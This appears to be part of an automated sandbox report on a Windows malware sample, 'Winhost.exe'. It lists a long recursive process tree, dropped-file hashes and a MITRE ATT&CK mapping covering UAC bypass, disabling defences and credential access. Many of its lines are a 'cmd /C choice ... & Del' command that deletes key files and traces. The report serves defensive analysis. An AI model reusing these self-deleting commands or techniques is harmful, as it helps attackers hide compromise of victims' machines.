        "C:\Users\Admin\AppData\Local\Temp\Winhost.exe"
        49⤵
        Executes dropped EXE
        
        PID:5484
        
        C:\Windows\SYSTEM32\cmd.exe
        
        "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\KeyAndIV.txt"
        50⤵
        
        PID:1808
        
        C:\Windows\system32\choice.exe
        
        choice /C Y /N /D Y /T 3
        51⤵
        
        PID:6340
        
        C:\Users\Admin\AppData\Local\Temp\Winhost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Winhost.exe"
        50⤵
        Checks computer location settings
        Executes dropped EXE
        
        PID:5828
        
        C:\Windows\SYSTEM32\cmd.exe
        
        "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\KeyAndIV.txt"
        51⤵
        
        PID:8020
        
        C:\Windows\system32\choice.exe
        
        choice /C Y /N /D Y /T 3
        52⤵
        
        PID:5808
        
        C:\Users\Admin\AppData\Local\Temp\Winhost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Winhost.exe"
        51⤵
        Checks computer location settings
        
        PID:12252
        
        C:\Windows\SYSTEM32\cmd.exe
        
        "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\KeyAndIV.txt"
        52⤵
        
        PID:13244
        
        C:\Windows\system32\choice.exe
        
        choice /C Y /N /D Y /T 3
        53⤵
        
        PID:12576
        
        C:\Users\Admin\AppData\Local\Temp\Winhost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Winhost.exe"
        52⤵
        
        PID:13580
        
        C:\Users\Admin\AppData\Local\Temp\Winhost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Winhost.exe"
        53⤵
        
        PID:12084
        
        C:\Windows\SYSTEM32\cmd.exe
        
        "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\KeyAndIV.txt"
        54⤵
        
        PID:13540
        
        C:\Windows\system32\choice.exe
        
        choice /C Y /N /D Y /T 3
        55⤵
        
        PID:8324
        
        C:\Users\Admin\AppData\Local\Temp\Winhost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Winhost.exe"
        54⤵
        Checks computer location settings
        
        PID:7556
        
        C:\Windows\SYSTEM32\cmd.exe
        
        "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\KeyAndIV.txt"
        55⤵
        
        PID:13256
        
        C:\Windows\system32\choice.exe
        
        choice /C Y /N /D Y /T 3
        56⤵
        
        PID:5316
        
        C:\Users\Admin\AppData\Local\Temp\Winhost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Winhost.exe"
        55⤵
        Checks computer location settings
        
        PID:8572
        
        C:\Windows\SYSTEM32\cmd.exe
        
        "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\KeyAndIV.txt"
        56⤵
        
        PID:8024
        
        C:\Windows\system32\choice.exe
        
        choice /C Y /N /D Y /T 3
        57⤵
        
        PID:7244
        
        C:\Users\Admin\AppData\Local\Temp\Winhost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Winhost.exe"
        56⤵
        
        PID:12096
        
        C:\Windows\SYSTEM32\cmd.exe
        
        "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\KeyAndIV.txt"
        57⤵
        
        PID:10624
        
        C:\Windows\system32\choice.exe
        
        choice /C Y /N /D Y /T 3
        58⤵
        
        PID:12856
        
        C:\Users\Admin\AppData\Local\Temp\Winhost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Winhost.exe"
        57⤵
        
        PID:10676
        
        C:\Users\Admin\AppData\Local\Temp\Winhost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Winhost.exe"
        58⤵
        
        PID:12160
        
        C:\Windows\SYSTEM32\cmd.exe
        
        "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\KeyAndIV.txt"
        59⤵
        
        PID:6904
        
        C:\Windows\system32\choice.exe
        
        choice /C Y /N /D Y /T 3
        60⤵
        
        PID:8724
        
        C:\Users\Admin\AppData\Local\Temp\Winhost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Winhost.exe"
        59⤵
        Checks computer location settings
        
        PID:10232
        
        C:\Windows\SYSTEM32\cmd.exe
        
        "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\KeyAndIV.txt"
        60⤵
        
        PID:9056
        
        C:\Windows\system32\choice.exe
        
        choice /C Y /N /D Y /T 3
        61⤵
        
        PID:10556
        
        C:\Users\Admin\AppData\Local\Temp\Winhost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Winhost.exe"
        60⤵
        
        PID:6948
        
        C:\Windows\SYSTEM32\cmd.exe
        
        "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\KeyAndIV.txt"
        61⤵
        
        PID:8544
        
        C:\Windows\system32\choice.exe
        
        choice /C Y /N /D Y /T 3
        62⤵
        
        PID:12168
        
        C:\Users\Admin\AppData\Local\Temp\Winhost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Winhost.exe"
        61⤵
        
        PID:10936
        
        C:\Users\Admin\AppData\Local\Temp\Winhost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Winhost.exe"
        62⤵
        Checks computer location settings
        
        PID:6324
        
        C:\Windows\SYSTEM32\cmd.exe
        
        "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\KeyAndIV.txt"
        63⤵
        
        PID:12364
        
        C:\Windows\system32\choice.exe
        
        choice /C Y /N /D Y /T 3
        64⤵
        
        PID:7792
        
        C:\Users\Admin\AppData\Local\Temp\Winhost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Winhost.exe"
        63⤵
        
        PID:13692
        
        C:\Windows\SYSTEM32\cmd.exe
        
        "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\KeyAndIV.txt"
        64⤵
        
        PID:6760
        
        C:\Windows\system32\choice.exe
        
        choice /C Y /N /D Y /T 3
        65⤵
        
        PID:8704
        
        C:\Users\Admin\AppData\Local\Temp\Winhost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Winhost.exe"
        64⤵
        Checks computer location settings
        
        PID:11136
        
        C:\Windows\SYSTEM32\cmd.exe
        
        "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\KeyAndIV.txt"
        65⤵
        
        PID:8920
        
        C:\Windows\system32\choice.exe
        
        choice /C Y /N /D Y /T 3
        66⤵
        
        PID:7380
        
        C:\Users\Admin\AppData\Local\Temp\Winhost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Winhost.exe"
        65⤵
        
        PID:9212
        
        C:\Windows\SYSTEM32\cmd.exe
        
        "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\KeyAndIV.txt"
        66⤵
        
        PID:10696
        
        C:\Windows\system32\choice.exe
        
        choice /C Y /N /D Y /T 3
        67⤵
        
        PID:10592
        
        C:\Users\Admin\AppData\Local\Temp\Winhost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Winhost.exe"
        66⤵
        
        PID:6700
        
        C:\Windows\SYSTEM32\cmd.exe
        
        "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\KeyAndIV.txt"
        67⤵
        
        PID:8912
        
        C:\Windows\system32\choice.exe
        
        choice /C Y /N /D Y /T 3
        68⤵
        
        PID:9284
        
        C:\Users\Admin\AppData\Local\Temp\Winhost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Winhost.exe"
        67⤵
        
        PID:9196
        
        C:\Windows\SYSTEM32\cmd.exe
        
        "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\KeyAndIV.txt"
        68⤵
        
        PID:6292
        
        C:\Windows\system32\choice.exe
        
        choice /C Y /N /D Y /T 3
        69⤵
        
        PID:11640
        
        C:\Users\Admin\AppData\Local\Temp\Winhost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Winhost.exe"
        68⤵
        Checks computer location settings
        
        PID:11296
        
        C:\Users\Admin\AppData\Local\Temp\Winhost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Winhost.exe"
        69⤵
        Checks computer location settings
        
        PID:5284
        
        C:\Users\Admin\AppData\Local\Temp\Winhost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Winhost.exe"
        70⤵
        
        PID:7640
        
        C:\Windows\SYSTEM32\cmd.exe
        
        "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\KeyAndIV.txt"
        71⤵
        
        PID:7988
        
        C:\Windows\system32\choice.exe
        
        choice /C Y /N /D Y /T 3
        72⤵
        
        PID:8888
        
        C:\Users\Admin\AppData\Local\Temp\Winhost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Winhost.exe"
        71⤵
        
        PID:10288
        
        C:\Windows\SYSTEM32\cmd.exe
        
        "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\KeyAndIV.txt"
        72⤵
        
        PID:10448
        
        C:\Windows\system32\choice.exe
        
        choice /C Y /N /D Y /T 3
        73⤵
        
        PID:8944
        
        C:\Users\Admin\AppData\Local\Temp\Winhost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Winhost.exe"
        72⤵
        
        PID:10088
        
        C:\Users\Admin\AppData\Local\Temp\Winhost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Winhost.exe"
        73⤵
        Checks computer location settings
        
        PID:10516
        
        C:\Windows\SYSTEM32\cmd.exe
        
        "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\KeyAndIV.txt"
        74⤵
        
        PID:6976
        
        C:\Windows\system32\choice.exe
        
        choice /C Y /N /D Y /T 3
        75⤵
        
        PID:9408
        
        C:\Users\Admin\AppData\Local\Temp\Winhost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Winhost.exe"
        74⤵
        Checks computer location settings
        
        PID:7940
        
        C:\Windows\SYSTEM32\cmd.exe
        
        "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\KeyAndIV.txt"
        75⤵
        
        PID:10124
        
        C:\Windows\system32\choice.exe
        
        choice /C Y /N /D Y /T 3
        76⤵
        
        PID:9280
        
        C:\Users\Admin\AppData\Local\Temp\Winhost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Winhost.exe"
        75⤵
        
        PID:10008
        
        C:\Windows\SYSTEM32\cmd.exe
        
        "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\KeyAndIV.txt"
        76⤵
        
        PID:11744
        
        C:\Windows\system32\choice.exe
        
        choice /C Y /N /D Y /T 3
        77⤵
        
        PID:12200
        
        C:\Users\Admin\AppData\Local\Temp\Winhost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Winhost.exe"
        76⤵
        
        PID:12272
        
        C:\Windows\SYSTEM32\cmd.exe
        
        "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\KeyAndIV.txt"
        77⤵
        
        PID:12976
        
        C:\Windows\system32\choice.exe
        
        choice /C Y /N /D Y /T 3
        78⤵
        
        PID:12024
        
        C:\Users\Admin\AppData\Local\Temp\Winhost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Winhost.exe"
        77⤵
        Checks computer location settings
        
        PID:10924
        
        C:\Windows\SYSTEM32\cmd.exe
        
        "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\KeyAndIV.txt"
        78⤵
        
        PID:17192
        
        C:\Windows\system32\choice.exe
        
        choice /C Y /N /D Y /T 3
        79⤵
        
        PID:17776
        
        C:\Users\Admin\AppData\Local\Temp\Winhost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Winhost.exe"
        78⤵
        
        PID:696
        
        C:\Windows\SYSTEM32\cmd.exe
        
        "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\KeyAndIV.txt"
        79⤵
        
        PID:18636
        
        C:\Windows\system32\choice.exe
        
        choice /C Y /N /D Y /T 3
        80⤵
        
        PID:18416
        
        C:\Users\Admin\AppData\Local\Temp\Winhost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Winhost.exe"
        79⤵
        Checks computer location settings
        
        PID:18808
        
        C:\Windows\SYSTEM32\cmd.exe
        
        "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\KeyAndIV.txt"
        80⤵
        
        PID:18528
        
        C:\Windows\system32\choice.exe
        
        choice /C Y /N /D Y /T 3
        81⤵
        
        PID:18016
        
        C:\Users\Admin\AppData\Local\Temp\Winhost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Winhost.exe"
        80⤵
        Checks computer location settings
        
        PID:17276
        
        C:\Windows\SYSTEM32\cmd.exe
        
        "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\KeyAndIV.txt"
        81⤵
        
        PID:17440
        
        C:\Windows\system32\choice.exe
        
        choice /C Y /N /D Y /T 3
        82⤵
        
        PID:17876
        
        C:\Users\Admin\AppData\Local\Temp\Winhost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Winhost.exe"
        81⤵
        Checks computer location settings
        
        PID:19100
        
        C:\Users\Admin\AppData\Local\Temp\Winhost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Winhost.exe"
        82⤵
        
        PID:18888
        
        C:\Windows\SYSTEM32\cmd.exe
        
        "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\KeyAndIV.txt"
        83⤵
        
        PID:18164
        
        C:\Windows\system32\choice.exe
        
        choice /C Y /N /D Y /T 3
        84⤵
        
        PID:19012
        
        C:\Users\Admin\AppData\Local\Temp\Winhost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Winhost.exe"
        83⤵
        
        PID:13940
        
        C:\Windows\SYSTEM32\cmd.exe
        
        "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\KeyAndIV.txt"
        84⤵
        
        PID:19388
        
        C:\Windows\system32\choice.exe
        
        choice /C Y /N /D Y /T 3
        85⤵
        
        PID:18616
        
        C:\Users\Admin\AppData\Local\Temp\Winhost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Winhost.exe"
        84⤵
        
        PID:1152
        
        C:\Windows\SYSTEM32\cmd.exe
        
        "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\KeyAndIV.txt"
        85⤵
        
        PID:19208
        
        C:\Windows\system32\choice.exe
        
        choice /C Y /N /D Y /T 3
        86⤵
        
        PID:13500
        
        C:\Users\Admin\AppData\Local\Temp\Winhost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Winhost.exe"
        85⤵
        
        PID:18512
        
        C:\Windows\SYSTEM32\cmd.exe
        
        "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\KeyAndIV.txt"
        86⤵
        
        PID:14124
        
        C:\Windows\system32\choice.exe
        
        choice /C Y /N /D Y /T 3
        87⤵
        
        PID:14184
        
        C:\Users\Admin\AppData\Local\Temp\Winhost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Winhost.exe"
        86⤵
        
        PID:18492
        
        C:\Windows\SYSTEM32\cmd.exe
        
        "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\KeyAndIV.txt"
        87⤵
        
        PID:4584
        
        C:\Windows\system32\choice.exe
        
        choice /C Y /N /D Y /T 3
        88⤵
        
        PID:14012
        
        C:\Users\Admin\AppData\Local\Temp\Winhost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Winhost.exe"
        87⤵
        
        PID:5080
        
        C:\Windows\SYSTEM32\cmd.exe
        
        "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\KeyAndIV.txt"
        88⤵
        
        PID:13880
        
        C:\Windows\system32\choice.exe
        
        choice /C Y /N /D Y /T 3
        89⤵
        
        PID:14028
        
        C:\Users\Admin\AppData\Local\Temp\Winhost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Winhost.exe"
        88⤵
        
        PID:1540
        
        C:\Windows\SYSTEM32\cmd.exe
        
        "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\KeyAndIV.txt"
        89⤵
        
        PID:11412
        
        C:\Windows\system32\choice.exe
        
        choice /C Y /N /D Y /T 3
        90⤵
        
        PID:4072
        
        C:\Users\Admin\AppData\Local\Temp\Winhost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Winhost.exe"
        89⤵
        
        PID:15132
        
        C:\Windows\SYSTEM32\cmd.exe
        
        "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\KeyAndIV.txt"
        90⤵
        
        PID:11200
        
        C:\Windows\system32\choice.exe
        
        choice /C Y /N /D Y /T 3
        91⤵
        
        PID:14828
        
        C:\Users\Admin\AppData\Local\Temp\Winhost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Winhost.exe"
        90⤵
        
        PID:9224
        
        C:\Windows\SYSTEM32\cmd.exe
        
        "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\KeyAndIV.txt"
        91⤵
        
        PID:8832
        
        C:\Windows\system32\choice.exe
        
        choice /C Y /N /D Y /T 3
        92⤵
        
        PID:5188
        
        C:\Users\Admin\AppData\Local\Temp\Winhost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Winhost.exe"
        91⤵
        
        PID:12400
        
        C:\Windows\SYSTEM32\cmd.exe
        
        "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\KeyAndIV.txt"
        92⤵
        
        PID:1804
        
        C:\Windows\system32\choice.exe
        
        choice /C Y /N /D Y /T 3
        93⤵
        
        PID:11308
        
        C:\Users\Admin\AppData\Local\Temp\Winhost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Winhost.exe"
        92⤵
        
        PID:5548

C:\Windows\System32\Winhost.exe
C:\Windows\System32\Winhost.exe
1⤵
- Executes dropped EXE
- Drops file in System32 directory
PID:17100
- C:\Windows\System32\Winhost.exe
  "C:\Windows\System32\Winhost.exe"
  2⤵
  - Executes dropped EXE
  - Drops file in System32 directory
  PID:15844
- - C:\Windows\System32\Winhost.exe
    "C:\Windows\System32\Winhost.exe"
    3⤵
    - Checks computer location settings
    - Executes dropped EXE
    - Drops file in System32 directory
    PID:14692
  - - C:\Windows\System32\Winhost.exe
      "C:\Windows\System32\Winhost.exe"
      4⤵
      Checks computer location settings
      Executes dropped EXE
      Drops file in System32 directory
      PID:16932
    - - C:\Windows\System32\Winhost.exe
        
        "C:\Windows\System32\Winhost.exe"
        5⤵
        Executes dropped EXE
        Drops file in System32 directory
        
        PID:14832
      - C:\Windows\System32\cmd.exe
        
        "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\CachedImage_1280_720_POS4.jpg"
        6⤵
        
        PID:16488
        
        C:\Windows\system32\choice.exe
        
        choice /C Y /N /D Y /T 3
        7⤵
        
        PID:15856
      - C:\Windows\System32\Winhost.exe
        
        "C:\Windows\System32\Winhost.exe"
        6⤵
        Executes dropped EXE
        
        PID:15500
        
        C:\Windows\System32\cmd.exe
        
        "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\CachedImage_1280_720_POS4.jpg"
        7⤵
        
        PID:18284
        
        C:\Windows\system32\choice.exe
        
        choice /C Y /N /D Y /T 3
        8⤵
        
        PID:12996
        
        C:\Windows\System32\Winhost.exe
        
        "C:\Windows\System32\Winhost.exe"
        7⤵
        Executes dropped EXE
        Drops file in System32 directory
        
        PID:18292
        
        C:\Windows\System32\Winhost.exe
        
        "C:\Windows\System32\Winhost.exe"
        8⤵
        Checks computer location settings
        Executes dropped EXE
        Drops file in System32 directory
        
        PID:12520
        
        C:\Windows\System32\Winhost.exe
        
        "C:\Windows\System32\Winhost.exe"
        9⤵
        Checks computer location settings
        Executes dropped EXE
        
        PID:5704
        
        C:\Windows\System32\Winhost.exe
        
        "C:\Windows\System32\Winhost.exe"
        10⤵
        Checks computer location settings
        Executes dropped EXE
        Drops file in System32 directory
        
        PID:8056
        
        C:\Windows\System32\Winhost.exe
        
        "C:\Windows\System32\Winhost.exe"
        11⤵
        Executes dropped EXE
        Drops file in System32 directory
        
        PID:11084
        
        C:\Windows\System32\Winhost.exe
        
        "C:\Windows\System32\Winhost.exe"
        12⤵
        Checks computer location settings
        Executes dropped EXE
        Drops file in System32 directory
        
        PID:5508
        
        C:\Windows\System32\Winhost.exe
        
        "C:\Windows\System32\Winhost.exe"
        13⤵
        Checks computer location settings
        Executes dropped EXE
        Drops file in System32 directory
        
        PID:13012
        
        C:\Windows\System32\Winhost.exe
        
        "C:\Windows\System32\Winhost.exe"
        14⤵
        Executes dropped EXE
        Drops file in System32 directory
        
        PID:7512
        
        C:\Windows\System32\Winhost.exe
        
        "C:\Windows\System32\Winhost.exe"
        15⤵
        Executes dropped EXE
        
        PID:10036
        
        C:\Windows\System32\Winhost.exe
        
        "C:\Windows\System32\Winhost.exe"
        16⤵
        Executes dropped EXE
        
        PID:7964
        
        C:\Windows\System32\Winhost.exe
        
        "C:\Windows\System32\Winhost.exe"
        17⤵
        Drops file in System32 directory
        
        PID:8416
        
        C:\Windows\System32\Winhost.exe
        
        "C:\Windows\System32\Winhost.exe"
        18⤵
        Checks computer location settings
        Drops file in System32 directory
        
        PID:12524
        
        C:\Windows\System32\Winhost.exe
        
        "C:\Windows\System32\Winhost.exe"
        19⤵
        Checks computer location settings
        Drops file in System32 directory
        
        PID:4424
        
        C:\Windows\System32\Winhost.exe
        
        "C:\Windows\System32\Winhost.exe"
        20⤵
        Checks computer location settings
        Drops file in System32 directory
        
        PID:5480
        
        C:\Windows\System32\Winhost.exe
        
        "C:\Windows\System32\Winhost.exe"
        21⤵
        Checks computer location settings
        Drops file in System32 directory
        
        PID:9548
        
        C:\Windows\System32\Winhost.exe
        
        "C:\Windows\System32\Winhost.exe"
        22⤵
        Drops file in System32 directory
        
        PID:12324
        
        C:\Windows\System32\Winhost.exe
        
        "C:\Windows\System32\Winhost.exe"
        23⤵
        
        PID:6048
        
        C:\Windows\System32\Winhost.exe
        
        "C:\Windows\System32\Winhost.exe"
        24⤵
        Checks computer location settings
        
        PID:13016
        
        C:\Windows\System32\Winhost.exe
        
        "C:\Windows\System32\Winhost.exe"
        25⤵
        Checks computer location settings
        Drops file in System32 directory
        
        PID:12800
        
        C:\Windows\System32\Winhost.exe
        
        "C:\Windows\System32\Winhost.exe"
        26⤵
        Checks computer location settings
        Drops file in System32 directory
        
        PID:6660
        
        C:\Windows\System32\Winhost.exe
        
        "C:\Windows\System32\Winhost.exe"
        27⤵
        Drops file in System32 directory
        
        PID:5324
        
        C:\Windows\System32\Winhost.exe
        
        "C:\Windows\System32\Winhost.exe"
        28⤵
        Drops file in System32 directory
        
        PID:13172
        
        C:\Windows\System32\Winhost.exe
        
        "C:\Windows\System32\Winhost.exe"
        29⤵
        Checks computer location settings
        
        PID:7200
        
        C:\Windows\System32\Winhost.exe
        
        "C:\Windows\System32\Winhost.exe"
        30⤵
        Drops file in System32 directory
        
        PID:13028
        
        C:\Windows\System32\Winhost.exe
        
        "C:\Windows\System32\Winhost.exe"
        31⤵
        Checks computer location settings
        Drops file in System32 directory
        
        PID:10816
        
        C:\Windows\System32\Winhost.exe
        
        "C:\Windows\System32\Winhost.exe"
        32⤵
        Checks computer location settings
        Drops file in System32 directory
        
        PID:10192
        
        C:\Windows\System32\Winhost.exe
        
        "C:\Windows\System32\Winhost.exe"
        33⤵
        
        PID:8280
        
        C:\Windows\System32\Winhost.exe
        
        "C:\Windows\System32\Winhost.exe"
        34⤵
        Drops file in System32 directory
        
        PID:8956
        
        C:\Windows\System32\Winhost.exe
        
        "C:\Windows\System32\Winhost.exe"
        35⤵
        Checks computer location settings
        Drops file in System32 directory
        
        PID:11360
        
        C:\Windows\System32\Winhost.exe
        
        "C:\Windows\System32\Winhost.exe"
        36⤵
        Drops file in System32 directory
        
        PID:5564
        
        C:\Windows\System32\Winhost.exe
        
        "C:\Windows\System32\Winhost.exe"
        37⤵
        Drops file in System32 directory
        
        PID:11756
        
        C:\Windows\System32\Winhost.exe
        
        "C:\Windows\System32\Winhost.exe"
        38⤵
        Checks computer location settings
        
        PID:6756
        
        C:\Windows\System32\Winhost.exe
        
        "C:\Windows\System32\Winhost.exe"
        39⤵
        Drops file in System32 directory
        
        PID:12236
        
        C:\Windows\System32\Winhost.exe
        
        "C:\Windows\System32\Winhost.exe"
        40⤵
        Checks computer location settings
        
        PID:8272
        
        C:\Windows\System32\Winhost.exe
        
        "C:\Windows\System32\Winhost.exe"
        41⤵
        Checks computer location settings
        Drops file in System32 directory
        
        PID:5628
        
        C:\Windows\System32\Winhost.exe
        
        "C:\Windows\System32\Winhost.exe"
        42⤵
        Drops file in System32 directory
        
        PID:11700
        
        C:\Windows\System32\Winhost.exe
        
        "C:\Windows\System32\Winhost.exe"
        43⤵
        Drops file in System32 directory
        
        PID:18868
        
        C:\Windows\System32\Winhost.exe
        
        "C:\Windows\System32\Winhost.exe"
        44⤵
        Checks computer location settings
        Drops file in System32 directory
        
        PID:19260
        
        C:\Windows\System32\Winhost.exe
        
        "C:\Windows\System32\Winhost.exe"
        45⤵
        Checks computer location settings
        Drops file in System32 directory
        
        PID:17904
        
        C:\Windows\System32\Winhost.exe
        
        "C:\Windows\System32\Winhost.exe"
        46⤵
        
        PID:18152
        
        C:\Windows\System32\Winhost.exe
        
        "C:\Windows\System32\Winhost.exe"
        47⤵
        Drops file in System32 directory
        
        PID:17936
        
        C:\Windows\System32\Winhost.exe
        
        "C:\Windows\System32\Winhost.exe"
        48⤵
        Drops file in System32 directory
        
        PID:18664
        
        C:\Windows\System32\Winhost.exe
        
        "C:\Windows\System32\Winhost.exe"
        49⤵
        Drops file in System32 directory
        
        PID:19364
        
        C:\Windows\System32\Winhost.exe
        
        "C:\Windows\System32\Winhost.exe"
        50⤵
        Checks computer location settings
        Drops file in System32 directory
        
        PID:19232
        
        C:\Windows\System32\Winhost.exe
        
        "C:\Windows\System32\Winhost.exe"
        51⤵
        Checks computer location settings
        
        PID:13816
        
        C:\Windows\System32\Winhost.exe
        
        "C:\Windows\System32\Winhost.exe"
        52⤵
        
        PID:13896
        
        C:\Windows\System32\Winhost.exe
        
        "C:\Windows\System32\Winhost.exe"
        53⤵
        
        PID:17372
        
        C:\Windows\System32\Winhost.exe
        
        "C:\Windows\System32\Winhost.exe"
        54⤵
        
        PID:2240
        
        C:\Windows\System32\Winhost.exe
        
        "C:\Windows\System32\Winhost.exe"
        55⤵
        
        PID:10228
        
        C:\Windows\System32\Winhost.exe
        
        "C:\Windows\System32\Winhost.exe"
        56⤵
        
        PID:6956
        
        C:\Windows\System32\Winhost.exe
        
        "C:\Windows\System32\Winhost.exe"
        57⤵
        
        PID:5868
        
        C:\Windows\System32\Winhost.exe
        
        "C:\Windows\System32\Winhost.exe"
        58⤵
        
        PID:3308

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Create or Modify System Process

T1543

Windows Service

T1543.003

Privilege Escalation

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Create or Modify System Process

T1543

Windows Service

T1543.003

Defense Evasion

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Impair Defenses

T1562

Disable or Modify Tools

T1562.001

Modify Registry

T1112

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Defacement

T1491

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\chrome_shutdown_ms.txt.420

Filesize
16B

MD5
f101fe20e0716532cb9f1267c6eac73a

SHA1
8724556abbe7a4b845c09bb113a9523324190446

SHA256
1927d3e54c658ef9452518f1b59b954fc586cd7ed376a112c4e1d5cc5050cdc1

SHA512
862a8ae8ba0e44fddb2039a48c118e677900df1ab2525f624e265a82abdb1d18cc2042a0d182276e44e3401cc1f96b99a36a10e619d841ca2e4923acf0fe914f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\edge_shutdown_ms.txt.420

Filesize
16B

MD5
28009e9d6a46da0efdf4ee508f7c7977

SHA1
56f2a047761179942ad790911ec71b752893e03f

SHA256
9302dea3cd2dd4103c730b639e1346c064add1c72d90c13e3a5a9d8cd119c2a5

SHA512
3fce09d9bd46b7d208eea4ad8b2d3d5e2b2640b9f4e76497d8e0da9e9625fcee0613285f5558bded00279ca1b8e691c5fd6099a8058efae40ebb71e59c988eab

Download Submit
